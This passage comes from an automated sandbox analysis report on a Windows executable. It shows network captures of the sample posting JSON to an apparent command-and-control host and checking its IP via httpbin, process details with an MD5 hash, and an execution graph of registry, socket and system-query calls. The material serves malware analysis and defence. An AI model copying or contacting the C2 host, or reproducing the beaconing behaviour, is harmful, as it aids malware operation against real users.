                                                              Data Ascii: 9IuvH\/i3XNK8PaRpi3tvoWky634zuLbwvP9TQ8c\/CzE0sLWoccZRUjjYSqYOKeLVbE0of2XetRw8sIq86LhnWVVoVo03SqYfHUcTCcsO5VI\/L1\/o6+NmFddV\/DvPaccLLkxFb\/YpYajVVLG1p0KmKhi5YeGJpQy\/GRrYZ1VXoVaSoVqcK9WlTqc7RWVBqeNF8Marqd94f0vUPGmqa8vhPwbLqesSeN9e8FeH9S1HQZ\/
                                                              Dec 20, 2024 16:44:45.656512976 CET212INHTTP/1.0 503 Service Unavailable
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.1049730185.121.15.192807688C:\Users\user\Desktop\2M43DSi2cx.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 20, 2024 16:44:46.876199961 CET284OUTPOST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                                              Host: home.fivetk5ht.top
                                                              Accept: */*
                                                              Content-Type: application/json
                                                              Content-Length: 143
                                                              Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                              Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
                                                              Dec 20, 2024 16:44:48.151928902 CET212INHTTP/1.0 503 Service Unavailable
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                              HTTPS Proxied Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.104971334.226.108.1554437688C:\Users\user\Desktop\2M43DSi2cx.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-20 15:44:42 UTC52OUTGET /ip HTTP/1.1
                                                              Host: httpbin.org
                                                              Accept: */*
                                                              2024-12-20 15:44:42 UTC224INHTTP/1.1 200 OK
                                                              Date: Fri, 20 Dec 2024 15:44:42 GMT
                                                              Content-Type: application/json
                                                              Content-Length: 31
                                                              Connection: close
                                                              Server: gunicorn/19.9.0
                                                              Access-Control-Allow-Origin: *
                                                              Access-Control-Allow-Credentials: true
                                                              2024-12-20 15:44:42 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                              Data Ascii: { "origin": "8.46.123.189"}


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:10:44:37
                                                              Start date:20/12/2024
                                                              Path:C:\Users\user\Desktop\2M43DSi2cx.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\2M43DSi2cx.exe"
                                                              Imagebase:0x420000
                                                              File size:4'483'072 bytes
                                                              MD5 hash:98F2F2F0D74571AF72DD4CA43C1692BF
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              Disassembly

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:2.3%
                                                                Dynamic/Decrypted Code Coverage:6.4%
                                                                Signature Coverage:10.7%
                                                                Total number of Nodes:596
                                                                Total number of Limit Nodes:90
                                                                execution_graph 81073 43d5e0 81074 43d652 WSAStartup 81073->81074 81075 43d5f0 81073->81075 81074->81075 81076 43d664 81074->81076 81078 43d67c 81075->81078 81080 43d690 _open 81075->81080 81079 43d5fa 81080->81079 80526 45b400 80527 45b425 80526->80527 80528 45b40b 80526->80528 80531 427770 80528->80531 80529 45b421 80532 427790 80531->80532 80533 4277b6 recv 80531->80533 80532->80533 80535 427799 80532->80535 80534 4277a3 80533->80534 80541 4277d4 80533->80541 80542 4272a0 _open 80534->80542 80535->80534 80537 4277db 80535->80537 80543 4272a0 _open 80537->80543 80539 4277ec 80544 42cb20 _open 80539->80544 80541->80529 80542->80541 80543->80539 80544->80541 80545 45e400 80546 45e412 80545->80546 80550 45e459 80545->80550 80547 45e422 80546->80547 80569 473030 _open 80546->80569 80570 4809d0 _open 80547->80570 80552 45e4a8 80550->80552 80554 45e495 80550->80554 80557 45b5a0 80550->80557 80551 45e42b 80571 4568b0 6 API calls 80551->80571 80554->80552 80556 45b5a0 _open 80554->80556 80556->80552 80558 45b5c0 80557->80558 80561 45b5d2 80557->80561 80559 45b713 80558->80559 80558->80561 80563 45b626 80558->80563 80573 464f40 _open 80559->80573 80561->80554 80562 45b65a 80562->80561 80564 45b72b 80562->80564 80565 45b737 80562->80565 80563->80561 80563->80562 80563->80564 80563->80565 80572 4650a0 _open 80563->80572 80564->80561 80574 4650a0 _open 80564->80574 80565->80561 80575 4650a0 _open 80565->80575 80569->80547 80570->80551 80571->80550 80572->80563 80573->80561 80574->80561 80575->80561 80576 45f100 80577 45f1b8 80576->80577 80579 45f11f 80576->80579 80578 45ff1a 80626 460c80 _open 80578->80626 80579->80577 80581 45f2a3 80579->80581 80588 45f603 80579->80588 80596 45f240 80579->80596 80611 464f40 _open 80581->80611 80583 460045 80583->80577 80586 46010d 80583->80586 80590 46004d 80583->80590 80629 4650a0 _open 80583->80629 80584 45f80d 80587 46015e 80586->80587 80630 4650a0 _open 80586->80630 80587->80590 80631 4650a0 _open 80587->80631 80588->80578 80588->80583 80588->80584 80589 46008a 80588->80589 80600 460d30 _open 80588->80600 80610 4650a0 _open 80588->80610 80624 42fa50 _open 80588->80624 80625 464fd0 _open 80588->80625 80628 464f40 _open 80589->80628 80632 464f40 _open 80590->80632 80596->80577 80612 427310 80596->80612 80599 45ff5b 80599->80577 80627 4650a0 _open 80599->80627 80600->80588 80602 427310 _open 80608 45f50d 80602->80608 80603 45f3ce 80603->80577 80604 45f491 80603->80604 80621 4650a0 _open 80603->80621 80604->80588 80604->80602 80606 45f5b9 80623 42fa50 _open 80606->80623 80608->80577 80608->80606 80622 4650a0 _open 80608->80622 80610->80588 80611->80577 80613 427320 80612->80613 80617 427332 80612->80617 80614 427390 80613->80614 80613->80617 80634 4272a0 _open 80614->80634 80616 4273a1 80635 42cb20 _open 80616->80635 80620 427380 80617->80620 80633 4272a0 _open 80617->80633 80620->80603 80621->80604 80622->80606 80623->80588 80624->80588 80625->80588 80626->80599 80627->80577 80628->80577 80629->80586 80630->80587 80631->80590 80632->80577 80633->80620 80634->80616 80635->80620 80636 45b3c0 80637 45b3ee 80636->80637 80638 45b3cb 80636->80638 80642 459290 80638->80642 80656 4276a0 80638->80656 80639 45b3ea 80643 4276a0 2 API calls 80642->80643 80644 4592e5 80643->80644 80645 4593c3 80644->80645 80647 4592f3 80644->80647 80650 459392 80645->80650 80667 43d090 _open 80645->80667 80646 4593be 80646->80639 80647->80650 80651 459335 WSAIoctl 80647->80651 80649 4593f7 80668 464f40 _open 80649->80668 80650->80646 80669 4650a0 _open 80650->80669 80651->80650 80654 459366 80651->80654 80654->80650 80655 459371 setsockopt 80654->80655 80655->80650 80657 4276c0 80656->80657 80658 4276e6 send 80656->80658 80657->80658 80659 4276c9 80657->80659 80660 4276d3 80658->80660 80663 427704 80658->80663 80659->80660 80661 42770b 80659->80661 80670 4272a0 _open 80660->80670 80671 4272a0 _open 80661->80671 80663->80639 80665 42771c 80672 42cb20 _open 80665->80672 80667->80649 80668->80650 80669->80646 80670->80663 80671->80665 80672->80663 80673 460700 80686 46099d 80673->80686 80687 460719 80673->80687 80675 427310 _open 80675->80687 80676 4609b5 80676->80686 80697 4650a0 _open 80676->80697 80677 4609f6 80698 4275a0 80677->80698 80680 460a35 80702 464f40 _open 80680->80702 80687->80675 80687->80676 80687->80677 80687->80680 80687->80686 80691 45b8e0 _open 80687->80691 80692 48f570 _open 80687->80692 80693 44eb30 _open 80687->80693 80694 4813a0 _open 80687->80694 80695 4a39a0 _open 80687->80695 80696 44eae0 _open 80687->80696 80689 4275a0 _open 80689->80686 80691->80687 80692->80687 80693->80687 80694->80687 80695->80687 80696->80687 80697->80686 80699 4275d1 80698->80699 80700 4275aa 80698->80700 80699->80689 80700->80699 80703 4272a0 _open 80700->80703 80702->80686 80703->80699 80704 8a6000 80705 8a6032 80704->80705 80706 8a603e 80705->80706 80709 7a8f70 80705->80709 80708 8a6047 80716 7a8e90 _open 80709->80716 80711 7a8f82 80712 7a8e90 _open 80711->80712 80713 7a8fa2 80712->80713 80714 7a8f70 _open 80713->80714 80715 7a8fb8 80714->80715 80715->80708 80717 7a8eba 80716->80717 80717->80711 80718 4213c9 80720 421160 80718->80720 80722 7a93e0 80720->80722 80732 8a61d0 80720->80732 80723 7a9400 80722->80723 80731 7a93f3 80722->80731 80724 7a9688 80723->80724 80725 7a96c7 80723->80725 80729 7a9220 vfprintf 80723->80729 80730 7a9280 vfprintf 80723->80730 80723->80731 80724->80725 80724->80731 80736 7a9280 vfprintf 80724->80736 80737 7a9220 vfprintf 80725->80737 80728 7a96df 80728->80720 80729->80723 80730->80723 80731->80720 80733 8a6202 80732->80733 80734 8a6353 80733->80734 80735 7a8f70 _open 80733->80735 80734->80720 80735->80733 80736->80724 80737->80728 80738 4d3c00 80739 4d3c23 80738->80739 80741 4d3c0d 80738->80741 80739->80741 80742 4eb180 80739->80742 80745 4eb19b 80742->80745 80749 4eb2e3 80742->80749 80746 4eb2a9 getsockname 80745->80746 80748 4eb020 closesocket 80745->80748 80745->80749 80750 4eaf30 80745->80750 80754 4eb060 80745->80754 80759 4eb020 80746->80759 80748->80745 80749->80741 80751 4eaf4c 80750->80751 80752 4eaf63 socket 80750->80752 80751->80752 80753 4eaf52 80751->80753 80752->80745 80753->80745 80758 4eb080 80754->80758 80755 4eb0b0 connect 80756 4eb0bf WSAGetLastError 80755->80756 80757 4eb0ea 80756->80757 80756->80758 80757->80745 80758->80755 80758->80756 80758->80757 80760 4eb029 80759->80760 80761 4eb052 80759->80761 80762 4eb04b closesocket 80760->80762 80763 4eb03e 80760->80763 80761->80745 80762->80761 80763->80745 81081 4d4720 81085 4d4728 81081->81085 81082 4d4733 81084 4d4774 81085->81082 81092 4d476c 81085->81092 81093 4d5540 socket ioctlsocket connect getsockname closesocket 81085->81093 81087 4d482e 81087->81092 81094 4d9270 81087->81094 81089 4d4860 81099 4d4950 81089->81099 81091 4d4878 81092->81091 81105 4d30a0 socket ioctlsocket connect getsockname closesocket 81092->81105 81093->81087 81106 4da440 81094->81106 81096 4d92ab 81096->81089 81097 4d9297 81097->81096 81134 4dbbe0 socket ioctlsocket connect getsockname closesocket 81097->81134 81102 4d4966 81099->81102 81100 4d4aa0 gethostname 81101 4d49c5 81100->81101 81104 4d49b9 81100->81104 81101->81092 81102->81101 81102->81104 81135 4dbbe0 socket ioctlsocket connect getsockname closesocket 81102->81135 81104->81100 81104->81101 81105->81084 81132 4da46b 81106->81132 81107 4dad14 81107->81097 81108 4daa03 RegOpenKeyExA 81109 4daa27 RegQueryValueExA 81108->81109 81110 4dab70 RegOpenKeyExA 81108->81110 81111 4daacc RegQueryValueExA 81109->81111 81112 4daa71 81109->81112 81113 4dac34 RegOpenKeyExA 81110->81113 81131 4dab90 81110->81131 81115 4dab0e 81111->81115 81116 4dab66 RegCloseKey 81111->81116 81112->81111 81118 4daa85 RegQueryValueExA 81112->81118 81114 4dacf8 RegOpenKeyExA 81113->81114 81129 4dac54 81113->81129 81114->81107 81117 4dad56 RegEnumKeyExA 81114->81117 81115->81116 81122 4dab1e RegQueryValueExA 81115->81122 81116->81110 81117->81107 81119 4dad9b 81117->81119 81121 4daab3 81118->81121 81120 4dae16 RegOpenKeyExA 81119->81120 81123 4daddf RegEnumKeyExA 81120->81123 81124 4dae34 RegQueryValueExA 81120->81124 81121->81111 81127 4dab4c 81122->81127 81123->81107 81123->81120 81125 4daf43 RegQueryValueExA 81124->81125 81133 4dadaa 81124->81133 81126 4db052 RegQueryValueExA 81125->81126 81125->81133 81128 4dadc7 RegCloseKey 81126->81128 81126->81133 81127->81116 81128->81123 81129->81114 81130 4dafa0 RegQueryValueExA 81130->81133 81131->81113 81132->81107 81132->81108 81133->81125 81133->81126 81133->81128 81133->81130 81134->81096 81135->81104 80764 4ea080 80767 4e9740 80764->80767 80766 4ea09b 80768 4e9780 80767->80768 80772 4e975d 80767->80772 80769 4e9925 RegOpenKeyExA 80768->80769 80768->80772 80770 4e995a RegQueryValueExA 80769->80770 80769->80772 80771 4e9986 RegCloseKey 80770->80771 80771->80772 80772->80766 81136 42f7b0 81140 42f7c3 81136->81140 81158 42f97a 81136->81158 81138 42f932 81163 45cd80 81138->81163 81140->81158 81159 430150 81140->81159 81141 42f987 81184 471390 81141->81184 81142 42f942 81142->81141 81144 471390 _open 81142->81144 81143 42f854 81143->81138 81143->81158 81188 42fec0 8 API calls 81143->81188 81144->81142 81148 471390 _open 81149 42f9a0 81148->81149 81150 471390 _open 81149->81150 81151 42f9ac 81150->81151 81152 42f9bb WSACloseEvent 81151->81152 81153 4275a0 _open 81152->81153 81154 42f9df 81153->81154 81155 4275a0 _open 81154->81155 81156 42fa12 81155->81156 81157 4275a0 _open 81156->81157 81157->81158 81160 430167 81159->81160 81162 4301c3 81160->81162 81189 4330d0 _open 81160->81189 81162->81143 81164 45d0f1 81163->81164 81171 45cd9a 81163->81171 81164->81142 81165 45d0e5 81166 471390 _open 81165->81166 81166->81164 81167 45d0b4 81197 43f6c0 8 API calls 81167->81197 81168 45ce6b 81173 45d064 81168->81173 81183 45cf4b 81168->81183 81191 45dc30 6 API calls 81168->81191 81171->81165 81171->81168 81190 45dc30 6 API calls 81171->81190 81173->81167 81196 45de00 6 API calls 81173->81196 81175 45d016 81175->81173 81195 45de00 6 API calls 81175->81195 81178 45df30 _open 81178->81183 81179 45d018 81194 437380 _open 81179->81194 81180 436fa0 select 81180->81183 81183->81175 81183->81178 81183->81179 81183->81180 81192 45e130 6 API calls 81183->81192 81193 437380 _open 81183->81193 81185 42f98d 81184->81185 81187 47139d 81184->81187 81185->81148 81186 4275a0 _open 81186->81185 81187->81186 81188->81143 81189->81162 81190->81171 81191->81168 81192->81183 81193->81183 81194->81175 81195->81175 81196->81173 81197->81165 80773 458b50 80774 458b6b 80773->80774 80802 458be6 80773->80802 80775 458bf3 80774->80775 80776 458b8f 80774->80776 80774->80802 80806 45a550 80775->80806 80877 436e40 select 80776->80877 80780 458cd9 SleepEx getsockopt 80781 458d18 80780->80781 80786 458cb2 80781->80786 80787 458d43 80781->80787 80782 458e85 80788 458eae 80782->80788 80782->80802 80883 432a00 _open 80782->80883 80783 45a150 2 API calls 80794 458dff 80783->80794 80784 458c35 80865 45a150 80784->80865 80785 458c1f connect 80785->80784 80786->80782 80786->80783 80786->80802 80793 45a150 2 API calls 80787->80793 80788->80802 80884 4278b0 closesocket 80788->80884 80792 458bb5 80792->80802 80879 4650a0 _open 80792->80879 80793->80792 80794->80782 80881 43d090 _open 80794->80881 80795 458c8b 80798 458ba1 80795->80798 80799 458dc8 80795->80799 80798->80780 80798->80786 80798->80792 80880 45b100 _open 80799->80880 80800 458e67 80882 464fd0 _open 80800->80882 80807 45a575 80806->80807 80809 45a597 80807->80809 80888 4275e0 80807->80888 80833 45a6d9 80809->80833 80900 45ef30 80809->80900 80810 45a709 80814 4278b0 2 API calls 80810->80814 80821 45a713 80810->80821 80812 458bfc 80812->80784 80812->80785 80812->80786 80812->80802 80814->80821 80816 45a7e5 80820 45a811 setsockopt 80816->80820 80825 45a87c 80816->80825 80837 45a8ee 80816->80837 80818 45a641 80818->80816 80914 464fd0 _open 80818->80914 80820->80825 80829 45a83b 80820->80829 80821->80812 80913 4650a0 _open 80821->80913 80822 45a69b 80910 43d090 _open 80822->80910 80825->80837 80917 45b1e0 _open 80825->80917 80826 45a6c9 80911 464f40 _open 80826->80911 80829->80825 80915 43d090 _open 80829->80915 80830 45af56 80832 45af5d 80830->80832 80830->80833 80832->80821 80836 45a150 2 API calls 80832->80836 80833->80810 80833->80821 80912 432a00 _open 80833->80912 80834 45a86d 80916 464fd0 _open 80834->80916 80836->80821 80837->80833 80838 45abb9 80837->80838 80840 45ae32 80837->80840 80841 45acb8 80837->80841 80848 45af33 80837->80848 80855 45abe1 80837->80855 80843 45ad45 80838->80843 80846 45ade6 80838->80846 80838->80855 80919 456be0 9 API calls 80838->80919 80839 45b056 80928 43d090 _open 80839->80928 80840->80838 80925 464fd0 _open 80840->80925 80841->80833 80841->80838 80850 45acdc 80841->80850 80842 45af03 80842->80848 80926 464fd0 _open 80842->80926 80843->80846 80847 45ad5f 80843->80847 80923 43d090 _open 80846->80923 80920 4720d0 _open 80847->80920 80909 4867e0 ioctlsocket 80848->80909 80918 43d090 _open 80850->80918 80854 45b07b 80929 464f40 _open 80854->80929 80855->80833 80855->80839 80855->80842 80927 464fd0 _open 80855->80927 80859 45ad01 80924 464f40 _open 80859->80924 80860 45ad7b 80864 45adb7 80860->80864 80921 464fd0 _open 80860->80921 80922 473030 _open 80864->80922 80866 458c4d 80865->80866 80867 45a15f 80865->80867 80866->80795 80878 4650a0 _open 80866->80878 80867->80866 80868 45a181 getsockname 80867->80868 80869 45a1f7 80868->80869 80870 45a1d0 80868->80870 80871 45ef30 _open 80869->80871 80936 43d090 _open 80870->80936 80875 45a20f 80871->80875 80873 45a1eb 80938 464f40 _open 80873->80938 80875->80866 80937 43d090 _open 80875->80937 80877->80798 80878->80795 80879->80802 80880->80786 80881->80800 80882->80782 80883->80788 80885 4278c5 80884->80885 80886 4278d7 80884->80886 80939 4272a0 _open 80885->80939 80886->80802 80889 427607 socket 80888->80889 80890 4275ef 80888->80890 80891 42762b 80889->80891 80892 42763a 80889->80892 80890->80889 80893 427643 80890->80893 80894 427601 80890->80894 80930 4272a0 _open 80891->80930 80892->80809 80931 4272a0 _open 80893->80931 80894->80889 80897 427654 80932 42cb20 _open 80897->80932 80899 427674 80899->80809 80901 45ef47 80900->80901 80902 45efa8 80900->80902 80903 45ef81 80901->80903 80904 45ef4c 80901->80904 80908 45a63a 80902->80908 80935 42c960 _open 80902->80935 80934 483d10 _open 80903->80934 80904->80908 80933 483d10 _open 80904->80933 80908->80818 80908->80822 80909->80830 80910->80826 80911->80833 80912->80810 80913->80812 80914->80816 80915->80834 80916->80825 80917->80837 80918->80859 80919->80843 80920->80860 80921->80864 80922->80855 80923->80859 80924->80833 80925->80838 80926->80848 80927->80855 80928->80854 80929->80833 80930->80892 80931->80897 80932->80899 80933->80908 80934->80908 80935->80908 80936->80873 80937->80873 80938->80866 80939->80886 80940 422f17 80947 422f2c 80940->80947 80941 4231d3 80942 422fb3 RegOpenKeyExA 80942->80947 80943 42315c RegEnumKeyExA 80943->80947 80944 423046 RegOpenKeyExA 80945 423089 RegQueryValueExA 80944->80945 80944->80947 80946 42313b RegCloseKey 80945->80946 80945->80947 80946->80947 80947->80941 80947->80942 80947->80943 80947->80944 80947->80946 80948 4231d7 80949 4231f4 80948->80949 80950 423200 80949->80950 80951 4232dc CloseHandle 80949->80951 80951->80950 81198 4595b0 81199 4595fd 81198->81199 81200 4595c8 81198->81200 81200->81199 81201 45a150 2 API calls 81200->81201 81201->81199 81202 456ab0 81203 456ad5 81202->81203 81204 456bb4 81203->81204 81206 436fa0 select 81203->81206 81205 4d5ed0 7 API calls 81204->81205 81207 456ba9 81205->81207 81208 456b54 81206->81208 81208->81204 81208->81207 81209 456b5d 81208->81209 81209->81207 81211 4d5ed0 81209->81211 81214 4d5a50 81211->81214 81213 4d5ee5 81213->81209 81215 4d5a58 81214->81215 81221 4d5ea0 81214->81221 81216 4d5b50 81215->81216 81226 4d5a99 81215->81226 81227 4d5b88 81215->81227 81219 4d5b7a 81216->81219 81220 4d5eb4 81216->81220 81216->81227 81217 4d5e96 81247 4e9480 socket ioctlsocket connect getsockname closesocket 81217->81247 81237 4d70a0 81219->81237 81248 4d6f10 socket ioctlsocket connect getsockname closesocket 81220->81248 81221->81213 81224 4d5ec2 81224->81224 81226->81227 81230 4d70a0 6 API calls 81226->81230 81244 4d6f10 socket ioctlsocket connect getsockname closesocket 81226->81244 81231 4d5cae 81227->81231 81245 4d5ef0 socket ioctlsocket connect getsockname 81227->81245 81230->81226 81231->81217 81233 4ea920 81231->81233 81246 4e9320 socket ioctlsocket connect getsockname closesocket 81231->81246 81234 4ea944 81233->81234 81235 4ea977 send 81234->81235 81236 4ea94b 81234->81236 81235->81231 81236->81231 81238 4d70ae 81237->81238 81240 4d717f 81238->81240 81243 4d71a7 81238->81243 81249 4ea8c0 81238->81249 81253 4d71c0 socket ioctlsocket connect getsockname 81238->81253 81240->81243 81254 4e9320 socket ioctlsocket connect getsockname closesocket 81240->81254 81243->81227 81244->81226 81245->81227 81246->81231 81247->81221 81248->81224 81250 4ea8e6 81249->81250 81251 4ea903 recvfrom 81249->81251 81250->81251 81252 4ea8ed 81250->81252 81251->81252 81252->81238 81253->81238 81254->81243 80952 89ed10 80955 89ed5a 80952->80955 80953 89ed73 80954 7a8f70 _open 80956 89edb6 80954->80956 80955->80953 80955->80954 80957 7ab160 Sleep 81255 431139 81280 45baa0 81255->81280 81257 431148 81258 431512 81257->81258 81261 431161 81257->81261 81260 431527 81258->81260 81284 42fec0 8 API calls 81258->81284 81269 430f69 81260->81269 81285 4322d0 8 API calls 81260->81285 81266 430150 _open 81261->81266 81261->81269 81262 431fb0 81268 430f00 81262->81268 81287 434940 _open 81262->81287 81263 431f58 81264 430150 _open 81263->81264 81275 431f61 81264->81275 81266->81269 81270 430150 _open 81268->81270 81277 430f21 81268->81277 81269->81262 81269->81263 81269->81268 81270->81277 81271 431fa6 81271->81268 81272 43208a 81271->81272 81274 4275a0 _open 81271->81274 81271->81277 81288 433900 _open 81272->81288 81276 432057 81274->81276 81275->81271 81286 45d4d0 6 API calls 81275->81286 81279 4275a0 _open 81276->81279 81279->81272 81281 45bb60 81280->81281 81282 45bac7 81280->81282 81281->81257 81282->81281 81289 4405b0 _open 81282->81289 81284->81260 81285->81269 81286->81271 81287->81271 81288->81268 81289->81281 80958 423d5e 80960 423d30 80958->80960 80959 423d90 80967 42fcb0 8 API calls 80959->80967 80960->80958 80960->80959 80964 430ab0 80960->80964 80963 423dc1 80968 4305b0 80964->80968 80967->80963 80969 4307c7 80968->80969 80977 4305bd 80968->80977 80969->80960 80970 43066a 80987 45dec0 80970->80987 80974 43067b 80980 4306f0 80974->80980 80983 4307ce 80974->80983 80994 4373b0 _open 80974->80994 80977->80969 80977->80970 80977->80983 80992 4303c0 _open 80977->80992 80993 437450 _open 80977->80993 80978 430707 WSAEventSelect 80978->80980 80978->80983 80979 4307ef 80979->80983 80986 430847 80979->80986 80996 436fa0 80979->80996 80980->80978 80980->80979 80982 4276a0 2 API calls 80980->80982 80982->80980 80995 437380 _open 80983->80995 80984 4309e8 WSAEnumNetworkEvents 80985 4309d0 WSAEventSelect 80984->80985 80984->80986 80985->80984 80985->80986 80986->80983 80986->80984 80986->80985 80988 45df1e 80987->80988 80990 45dece 80987->80990 81000 45df30 80990->81000 80991 45def9 80991->80974 80992->80977 80993->80977 80994->80974 80995->80969 80997 436fd4 80996->80997 80999 436feb 80996->80999 80998 437207 select 80997->80998 80997->80999 80998->80999 80999->80986 81003 45df44 81000->81003 81001 45dfb5 81001->80991 81003->81001 81004 45dfb9 81003->81004 81006 437450 _open 81003->81006 81007 437380 _open 81004->81007 81006->81003 81007->81001 81290 4229ff FindFirstFileA 81291 422a31 81290->81291 81292 422a5c RegOpenKeyExA 81291->81292 81293 422a93 81292->81293 81294 422ade CharUpperA 81293->81294 81295 422b0a 81294->81295 81296 422bf9 QueryFullProcessImageNameA 81295->81296 81297 422c3b CloseHandle 81296->81297 81298 422c64 81297->81298 81299 422df1 CloseHandle 81298->81299 81300 422e23 81299->81300 81008 42255d 81033 7a9f70 81008->81033 81010 42256c GetSystemInfo 81011 422589 81010->81011 81012 4225a0 GlobalMemoryStatusEx 81011->81012 81013 4225ec 81012->81013 81035 6eb00ab 81013->81035 81039 6eb03a4 GetLogicalDrives 81013->81039 81041 6eb01e5 81013->81041 81045 6eb01c5 81013->81045 81049 6eb0000 81013->81049 81053 6eb0286 81013->81053 81057 6eb028d 81013->81057 81061 6eb00e2 81013->81061 81065 6eb02fa 81013->81065 81069 6eb01ae 81013->81069 81034 7a9f7d 81033->81034 81034->81010 81034->81034 81036 6eb0048 81035->81036 81037 6eb03a9 GetLogicalDrives 81036->81037 81038 6eb03c6 81037->81038 81040 6eb03c6 81039->81040 81042 6eb0192 81041->81042 81043 6eb03a9 GetLogicalDrives 81042->81043 81044 6eb03c6 81043->81044 81046 6eb01c8 81045->81046 81047 6eb03a9 GetLogicalDrives 81046->81047 81048 6eb03c6 81047->81048 81050 6eb001b 81049->81050 81051 6eb03a9 GetLogicalDrives 81050->81051 81052 6eb03c6 81051->81052 81054 6eb0291 81053->81054 81055 6eb03a9 GetLogicalDrives 81054->81055 81056 6eb03c6 81055->81056 81058 6eb02ad 81057->81058 81059 6eb03a9 GetLogicalDrives 81058->81059 81060 6eb03c6 81059->81060 81062 6eb00ee 81061->81062 81063 6eb03a9 GetLogicalDrives 81062->81063 81064 6eb03c6 81063->81064 81066 6eb0320 81065->81066 81067 6eb03a9 GetLogicalDrives 81066->81067 81068 6eb03c6 81067->81068 81070 6eb01bc 81069->81070 81071 6eb03a9 GetLogicalDrives 81070->81071 81072 6eb03c6 81071->81072

                                                                Executed Functions

                                                                Function 0045F100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                • Associated: 00000000.00000002.1424227343.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424718261.0000000000B66000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000B68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425042232.0000000000EF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425165243.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425184734.00000000010B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_420000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID:
